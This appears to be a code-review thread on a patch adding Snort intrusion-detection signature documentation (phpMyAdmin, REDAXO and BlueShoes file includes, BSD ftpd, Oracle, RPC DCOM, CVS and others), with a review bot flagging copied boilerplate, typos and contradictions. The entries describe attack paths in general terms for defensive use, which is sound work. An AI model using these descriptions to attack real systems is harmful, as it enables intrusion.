+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using ActualScripts
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
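Review bot: The third Detailed Information paragraph in 100000319.txt ("Some applications do not perform stringent checks when validating the credentials of a client host ...") describes an authentication weakness, not the remote file include via the "rf" parameter that the first paragraph documents; drop it or replace it with a sentence on why an unvalidated "rf" value passed to "direct.php" lets a remote file be included. Likewise, Attack Scenarios talks about supplying credentials to an authentication mechanism, which does not match this signature. Smaller points: "running ona web server" should be "running on a web server", "an exploitation attempt has been attempted" is redundant (just "an exploitation attempt"), and several lines carry trailing whitespace.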
--- /dev/null
+++ b/doc/signatures/2228.txt
@@ -0,0 +1,62 @@
+Rule:  
+
+--
+Sid:
+2228
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in phpMyAdmin.
+
+--
+Impact:
+Varies. Information disclosure, Cross site scripting, unauthorized 
+access, directory traversal.
+
+--
+Detailed Information:
+Multiple versions of the PHP application phpMyAdmin suffer from many 
+known vulnerabilities that can lead to information disclosure, cross 
+site scripting attacks and unauthorized access to the application.
+
+--
+Affected Systems:
+	phpMyAdmin 2.0, 2.0.1 to 2.0.5
+	phpMyAdmin 2.1, 2.1.1, 2.1.2
+	phpMyAdmin 2.2.2 to 2.2.6
+	phpMyAdmin 2.3.1, 2.3.2
+	phpMyAdmin 2.4.0, 2.5.0, 2.5.1
+
+--
+Attack Scenarios:
+The attacker can utilize a directory traversal technique to disclose 
+information in a sensitive system file, then use that information to 
+propagate further attacks against the system.
+
+--
+Ease of Attack:
+Simple. No exploit software is required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
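Review bot: Additional References in 2228.txt is empty while Affected Systems lists a precise set of phpMyAdmin versions and Detailed Information says the vulnerabilities are "known"; at least one advisory or CVE link should back those version claims so the reader can verify which release fixes them. In Impact, "Cross site scripting" is capitalised mid-sentence; use "cross-site scripting" as in Detailed Information. The "-- " separator before Additional References has trailing whitespace, unlike the others in this file.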
--- /dev/null
+++ b/doc/signatures/100000414.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000414
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "REDAXO" application running on a webserver. Access to the file "community.inc.php" using a remote file being passed as the "REX[INCLUDE_PATH]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "REX[INCLUDE_PATH]" parameter in the "community.inc.php" script used by the "REDAXO" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using REDAXO
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
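Review bot: The Summary, Impact, Detailed Information and Attack Scenarios in 100000414.txt are the same boilerplate as the other remote file include entries, and the credential-validation paragraph again does not describe the "REX[INCLUDE_PATH]" include flaw in "community.inc.php"; trim it to the first two paragraphs, which are the ones specific to this rule. Also fix "running ona web server" and "attempt has been attempted", and note that the long single-line paragraphs here differ from the wrapped style used in 100000319.txt; pick one wrapping convention for the directory.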
--- /dev/null
+++ b/doc/signatures/2878.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2878
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure alter_site_priority
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
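Review bot: In 2878.txt the procedure name is split from its sentence by a stray line break ("vulnerability in the procedure alter_site_priority" / ". This procedure is included in"); join them into one sentence, e.g. "vulnerability in the procedure alter_site_priority, which is included in sys.dbms_repcat_conf." Affected Systems reads "Oracle Oracle9i" (vendor name duplicated). "None Known" in False Positives/Negatives uses a different capitalisation from the "None known." used elsewhere in the patch, and several "-- " separators carry trailing whitespace. Additional References is empty for a vulnerability that Corrective Action says has a vendor patch.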
--- /dev/null
+++ b/doc/signatures/339.txt
@@ -0,0 +1,95 @@
+Rule:  
+
+--
+Sid:
+339
+
+--
+Summary:
+
+--
+Impact:
+Severe; This is a remote exploit that could result in a root compromise.
+
+--
+Detailed Information:
+There is an off-by-one error in the replydirname() function in the BSD FTP deamon which is also present in many derivitave works.  This vulnerability allows an attacker to overflow the buffer by one byte, overwriting the first byte of the return pointer on the stack.
+
+--
+Affected Systems:
+	BSD ftpd 0.3.2
+	 + Progeny Debian 1.0
+	David A. Holland linux-ftpd 0.17
+	 + Progeny Debian 1.0
+	David Madore ftpd-BSD 0.2.3
+	  - Caldera OpenLinux 2.2
+	  - Caldera OpenLinux 2.3
+	  - Caldera OpenLinux 2.4
+	  - Debian Linux 2.0
+	  - Debian Linux 2.1
+	  - Debian Linux 2.2
+	  - Debian Linux 2.3
+	  - MandrakeSoft Linux Mandrake 6.0
+	  - MandrakeSoft Linux Mandrake 6.1
+	  - MandrakeSoft Linux Mandrake 7.0
+	  - MandrakeSoft Linux Mandrake 7.1
+	  - MandrakeSoft Linux Mandrake 7.2
+	  - RedHat Linux 5.0
+	  - RedHat Linux 6.0 x
+	  - RedHat Linux 7.0
+	  - Slackware Linux 4.0
+	  - Slackware Linux 7.0
+	  - Slackware Linux 7.1
+	NetBSD NetBSD 1.4
+	NetBSD NetBSD 1.4.1
+	NetBSD NetBSD 1.4.2
+	NetBSD NetBSD 1.5
+	OpenBSD 2.4
+	OpenBSD 2.5
+	OpenBSD 2.6
+	OpenBSD 2.7
+	OpenBSD 2.8
+Note: OpenBSD ships with the FTP daemon turned off, so this is not on by default.
+
+--
+Attack Scenarios:
+The attacker could log into a vulnerable OpenBSD anonymous FTP server, calculate the buffer size, fill the buffer and over write the lowest byte on the base pointer with a null byte.  This would result in the attacker controling that space on the stack, with full access to control the host at will.
+
+--
+Ease of Attack:
+Simple; there are script versions of this exploit in the wild.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Update your machine to the latest version of OpenBSD.  If you are running OpenBSD 2.8, use the following patch: http://www.securityfocus.com/data/vulnerabilities/patches/005_ftpd.patch
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Mike Poor <mike.poor@sourcefire.com>
+
+-- 
+Additional References:
+
+Arachnids
+http://www.whitehats.com/info/IDS446
+
+Bugtraq
+http://www.securityfocus.com/bid/2124
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0053
+
+OpenBSD
+http://www.openbsd.org/errata28.html#ftpd
+
+--
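Review bot: The Summary section of 339.txt is empty; a one-line statement that the event fires on an FTP command that could trigger the replydirname() off-by-one is needed, since Summary is what most readers see first. Corrective Action only covers OpenBSD ("Update your machine to the latest version of OpenBSD") even though Affected Systems also lists NetBSD, linux-ftpd and many Linux distributions; generalise it to "apply the vendor patch for your ftpd" with the OpenBSD patch as one example. Spelling: "deamon", "derivitave" and "controling" should be "daemon", "derivative" and "controlling", and "RedHat Linux 6.0 x" looks like a mangled version string.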
--- /dev/null
+++ b/doc/signatures/589.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+589
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) yppasswd is listening.
+
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port yppasswd is using.  Attackers can also learn what versions of the yppasswd protocol are accepted by yppasswd. 
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as yppasswd run.  The yppasswd RPC service handles password change requests from the yppasswd client program.  This client program is used to change a user password in Network Information Service (NIS) environments where a centralized database exists to distribute passwords throughout a network.  Multiple vulnerabilities are associated with the yppasswd RPC service.
+
+--
+Affected Systems:
+All hosts running the UNIX portmapper.
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where yppasswd runs.  This may be a precursor to querying yppasswd for usage statistics.
+
+--
+Ease of Attack:
+Easy.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access yppasswd, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for yppasswd, not probes of the yppasswd service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the yppasswd service itself. An attacker may attempt to go directly to the yppasswd port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS14
+
+
+--
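Review bot: Attack Scenarios in 589.txt says the GETPORT request "may be a precursor to querying yppasswd for usage statistics", but Detailed Information states that yppasswd handles password change requests, not statistics; this sentence looks copied from another RPC signature and should describe the actual risk, such as locating the service before attempting the vulnerabilities Detailed Information mentions. In Corrective Action, "Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines" is unclear about direction; "deny external access to RPC ports on RPC-enabled machines" says what is meant. There are double blank lines after the Summary and before the closing separator.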
--- /dev/null
+++ b/doc/signatures/100000434.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000434
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "BlueShoes" application running on a webserver. Access to the file "Bs_ImageArchive.class.php" using a remote file being passed as the "APP[path][core]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "APP[path][core]" parameter in the "Bs_ImageArchive.class.php" script used by the "BlueShoes" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using BlueShoes
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
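Review bot: 100000434.txt is missing the blank line before the "--" separator after the Sid, Affected Systems and Contributors sections, which breaks the layout every other file in this patch follows; add them so the files can be parsed consistently. The credential-validation paragraph in Detailed Information and the credentials-based Attack Scenarios do not apply to a remote file include through "APP[path][core]" in "Bs_ImageArchive.class.php" and should be cut, as in the sibling RFI entries. "running ona web server" and "attempt has been attempted" need the same fixes noted for those files.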
--- /dev/null
+++ b/doc/signatures/869.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+869
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
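Review bot: 869.txt is a word-for-word copy of 853.txt, including the "running ona web server" typo, so nothing in the documentation distinguishes the two rules; the Summary of each should state which CGI script or request pattern that sid matches. If the two rules really cover the same thing, note the relation explicitly in Detailed Information. The "attackers choosing" possessive and the empty Additional References section also need the same treatment as in 853.txt.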
--- /dev/null
+++ b/doc/signatures/3382.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3382
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
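Review bot: Attack Scenarios in 3382.txt ("a request for a file with an overly long filename via a network share") contradicts Detailed Information, which says the overflow is triggered by "malformed data via RPC" to the DCOM interface; the scenario text appears to come from an SMB signature and should be rewritten around a malformed RPC DCOM request. "Expoit code exists" should read "Exploit code exists". Additional References is empty although Corrective Action refers to vendor patches; link the Microsoft bulletin so the ports listed (135, 139, 445) can be cross-checked against the vendor's guidance.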
--- /dev/null
+++ b/doc/signatures/2236.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+2236
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer 
+overflow in Trend Micro InterScan eManager.
+
+--
+Impact:
+Serious. Remote administrative access is possible.
+
+--
+Detailed Information:
+Versions of Trend Micro InterScan eManager suffer from a buffer overflow
+condition that can present an attacker with the opportunity to execute 
+arbitrary code of their choosing which could lead to remote access to 
+the server.
+
+--
+Affected Systems:
+	Trend Micro InterScan eManager 3.51
+
+--
+Attack Scenarios:
+If the buffer overflow condition is met, the attacker can run code of 
+their choosing on the affected host.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Disable the web interface
+
+Enable NTLM authentication for the administrative interface
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/3327
+
+--
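Review bot: The last two Corrective Action items in 2236.txt ("Disable the web interface", "Enable NTLM authentication for the administrative interface") lack terminal punctuation and read as alternatives without saying so; make clear whether both are recommended together with the upgrade, or whether they are workarounds when upgrading is not possible. "attacker with the opportunity to execute arbitrary code of their choosing" is redundant ("arbitrary code" already means of their choosing).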
--- /dev/null
+++ b/doc/signatures/2010.txt
@@ -0,0 +1,98 @@
+Rule:
+
+--
+Sid:
+2010
+
+--
+Summary:
+CVS is the Concurrent Versions System, commonly used to 
+help manage software development. It is possible for a remote
+attacker to exploit a bug in the cvs daemon that will allow the 
+perpetrator the ability to execute code, issue a denial of service, 
+compromise code being stored in CVS and read sensitive information. 
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources on the machine. Software development could 
+be halted, code could be lost or stolen and code auditing after the fact
+could affect delivery of software.
+
+--
+Detailed Information:
+Specially crafted directory requests can be used to exploit a double 
+free memory reference bug in the CVS software. It is possible to force 
+the CVS daemon to execute an error that returns a pointer to already 
+freed memory. This is a well known bug.
+
+Since cvsd may be run as root via inetd, the compromise will present the
+attacker with root privileges on the machine. Any code the attacker is 
+able to execute will have root privileges.
+
+It is also possible for the attacker to bypass all write checks and be 
+able to write to the repository using the "anonymous" or "anoncvs" 
+accounts commonly used for read only access. The source code may then be
+compromised by the attacker who could choose to insert malicious code of
+his own making.
+
+If the CVS password database is writable by the CVS user the result is a
+remote root compromise.
+
+For CVS daemons running under changed root conditions (chroot), the rest
+of the operating system files may be protected but the entire CVS 
+directory structure is vulnerable.
+
+--
+Affected Systems:
+	CVS versions 1.11.4 and earlier
+	
+--
+Attack Scenarios:
+The attacker could pass a specially crafted directory request to trigger
+an error condition. The attacker may then be presented with the 
+opportunity to execute code or issue shell commands on some systems.
+
+--
+Ease of Attack:
+Simple, an exploit is available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+Connections to the server using zlib compression will not generate this
+event.
+
+--
+Corrective Action:
+Disable the CVS daemon in the file /etc/inetd.conf. Run the CVS daemon 
+as a user other than root that does not have a valid login to the 
+machine.
+
+Disable anonymous access to the cvs server.
+
+Update the CVS software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+www.cert.org/advisories/CA-2003-02.html
+www.kb.cert.org/vuls/id/650937
+
+CVE Entry:
+CAN-2003-0015
+
+CVS:
+http://ccvs.cvshome.org/servlets/NewsItemView?newsID=51
+
+--
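Review bot: The Summary of 2010.txt describes what CVS is rather than what the event signals, unlike every other file in this patch; lead with "This event is generated when a specially crafted directory request is sent to a CVS server" and move the background to Detailed Information. In Corrective Action, "Disable the CVS daemon in the file /etc/inetd.conf. Run the CVS daemon as a user other than root" reads as two contradictory instructions; phrase it as "disable the daemon if it is not needed; otherwise run it as an unprivileged user". "execute an error that returns a pointer to already freed memory" is confusing wording for a double free. The CERT links lack the "http://" scheme used by the other references, and the line after "CVS versions 1.11.4 and earlier" contains only a tab.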
--- /dev/null
+++ b/doc/signatures/2164.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+2164
+
+
+--
+Summary:
+This event is generated when a possible outgoing virus is detected. 
+
+--
+Impact:
+Informational event. An virus on an infected host may be attempting to 
+propogate.
+
+--
+Detailed Information:
+This event indicates that an outgoing email message possibly containing 
+a virus has been detected.
+
+This rule generates an event when a filename extension commonly used by 
+viruses is detected.
+
+--
+Affected Systems:
+Any host.
+
+--
+Attack Scenarios:
+This is indicative of a virus infection.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A legitimate attachment to an email may generate this event.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of virus infection.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
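Review bot: Detailed Information in 2164.txt says the rule fires on "a filename extension commonly used by viruses" without saying which extensions, which is exactly what an analyst needs to evaluate the False Positives entry ("A legitimate attachment ... may generate this event"); list the extensions the rule matches. In Impact, "An virus" should be "A virus" and "propogate" should be "propagate". There is an extra blank line after the Sid and another before the closing separator.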
--- /dev/null
+++ b/doc/signatures/951.txt
@@ -0,0 +1,83 @@
+Rule:
+
+--
+Sid:
+951
+
+--
+
+Summary:
+This event is generated when an attempt is made to access a file with 
+Microsoft Personal Web Server login information.
+
+--
+
+Impact:
+If successful, the attacker can log into the system and modify web 
+content.
+
+--
+
+Detailed Information:
+On systems running Microsoft Personal Web Server the file authors.pwd 
+contains usernames and encrypted passwords for users who can author the 
+contents on this server. The attacker can guess the exact URL of this 
+file and request it, hence gaining insecure information.
+
+--
+
+Affected Systems:
+Certain versions of Microsoft Windows 95 or Windows 98 running Personal 
+Web Server 4.0. Windows NT installations are not affected.
+
+--
+
+Attack Scenarios:
+An attacker can request the file from its standard location, entering 
+the exact URL, and gain access to the system after cracking the 
+passwords found in the file.
+
+--
+
+Ease of Attack:
+Simple.
+
+--
+
+False Positives:
+None known.
+
+--
+
+False Negatives:
+None known.
+
+--
+
+Corrective Action:
+Apply the appropriate vendor supplied patch.
+
+--
+
+Contributors:
+Original Rule Writer Unknown
+Snort documentation contributed by Chaos <c@aufbix.org>
+
+-- 
+
+Additional References:
+
+Official fix:
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS99-010.asp
+
+
+Nessus:
+http://cgi.nessus.org/plugins/dump.php3?id=10078
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0386
+
+
+
+
+--
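Review bot: In 951.txt, "hence gaining insecure information" should read "thereby obtaining sensitive information" (the information is sensitive, not insecure). The file puts a blank line after every "--" separator, unlike the rest of the patch, and has four trailing blank lines before the final separator; normalise the layout. Corrective Action ("Apply the appropriate vendor supplied patch") would be clearer if it referred to the MS99-010 bulletin already listed under Additional References.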
--- /dev/null
+++ b/doc/signatures/2452.txt
@@ -0,0 +1,52 @@
+Rule:
+
+--
+Sid:
+2452
+
+--
+Summary:
+This event is generated when a host in your network that has Yahoo Instant Messenger running attempts to maintain contact with a Yahoo IM server.
+
+--
+Impact:
+Possible policy violation.  Instant Messenger programs may not be appropriate in certain network environments.
+
+--
+Detailed Information:
+Hosts running Yahoo IM periodically communicate with a Yahoo IM server to maintain their connection.  This is a keep-alive message that simply indicates the presences of a host running Yahoo IM.
+
+--
+Affected Systems:
+Any host running Yahoo Instant Messenger.
+
+--
+Attack Scenarios:
+This particular type of Yahoo IM exchange has no known attacks, however it may represent a policy violation because the host is running Yahoo IM.
+
+--
+Ease of Attack:
+A host running Yahoo IM will automatically ping a Yahoo IM server.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+It may be possible for Yahoo IM traffic to use other ports than the default expected ones.  
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+--
+Additional References:
+Yahoo Protocol
+http://www.cse.iitb.ac.in/~varunk/YahooProtocol.htm
+
+--
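Review bot: The Ease of Attack entry in 2452.txt ("A host running Yahoo IM will automatically ping a Yahoo IM server") does not answer the heading; since Attack Scenarios already says there is no known attack, "Not applicable" as used in 560.txt would be consistent. In Detailed Information, "indicates the presences of a host" should be "presence". The blank line before the "--" separator after Contributors is missing.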
--- /dev/null
+++ b/doc/signatures/2982.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+2982
+
+--
+Summary:
+This event is generated when an attempt is made to access the ADMIN$
+administrative share of a Windows host.
+
+--
+Impact:
+Serious. Possible administrator access to the host. Information 
+disclosure.
+
+--
+Detailed Information:
+By default, Windows hosts have default administrative shares of the 
+local hard drives using the format %DRIVE_LETTER% + $. Anybody with 
+administrative rights can remotely access the share.
+
+--
+Affected Systems:
+	Windows hosts.
+
+--
+Attack Scenarios:
+An attacker may be attempting to access files located on the C drive of 
+the host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow Netbios access from external networks (tcp port 139).
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Josh Sakofsky
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS339
+
+Microsoft:
+http://support.microsoft.com/default.aspx?scid=kb;en-us;100517
+
+--
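Review bot: 2982.txt is internally inconsistent about which share it covers: the Summary says ADMIN$, Detailed Information describes the drive-letter shares (%DRIVE_LETTER% + $), and Attack Scenarios talks about "files located on the C drive", which would be C$ rather than ADMIN$. State in Detailed Information that ADMIN$ maps to the Windows system directory and reword the scenario accordingly. Corrective Action lists only "tcp port 139"; SMB on Windows 2000 and later also runs directly over TCP 445, so the filtering advice should cover both.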
--- /dev/null
+++ b/doc/signatures/560.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+560
+
+--
+Summary:
+This event is generated when network traffic indicating the use of an
+application or service that may violate a corporate security policy.
+
+--
+Impact:
+This may be a violation of corporate policy since some applications can
+be used to bypass security measures designed to restrict the flow of
+corporate information to destinations external to the corporation. In
+some instances this event may indicate behavior contrary to best
+security practices.
+
+In this case the event is generated when a VNC server response is
+detected. This traffic indicates that a VNC client has made an attempt
+to connect to a VNC server.
+
+Virtual Network Computing (VNC) allows users to connect machines across
+a network. It allows full control of the connected machine to take
+place, the user can access all resources on the machine and any other
+resources that machine is connected to.
+
+--
+Detailed Information:
+This event may indicate a violation of corporate policy. It may also
+indicate the use of services or applications that may be the antithesis
+of best security practices.
+
+--
+Affected Systems:
+	All systems
+
+--
+Attack Scenarios:
+Violation of corporate security policy can manifest serious risk to
+company assets.
+
+--
+Ease of Attack:
+Not applicable
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure adherence to best security practices and strict adherence to
+corporate policy
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
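Review bot: The Summary of 560.txt is a sentence fragment ("when network traffic indicating the use of an application ... that may violate a corporate security policy."); change "indicating" to "indicates". The VNC-specific explanation (the three paragraphs beginning "In this case the event is generated when a VNC server response is detected") is under Impact, while Detailed Information holds only generic policy text; swap them so Detailed Information describes the VNC server response the rule matches. Corrective Action lacks a terminal period.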
--- /dev/null
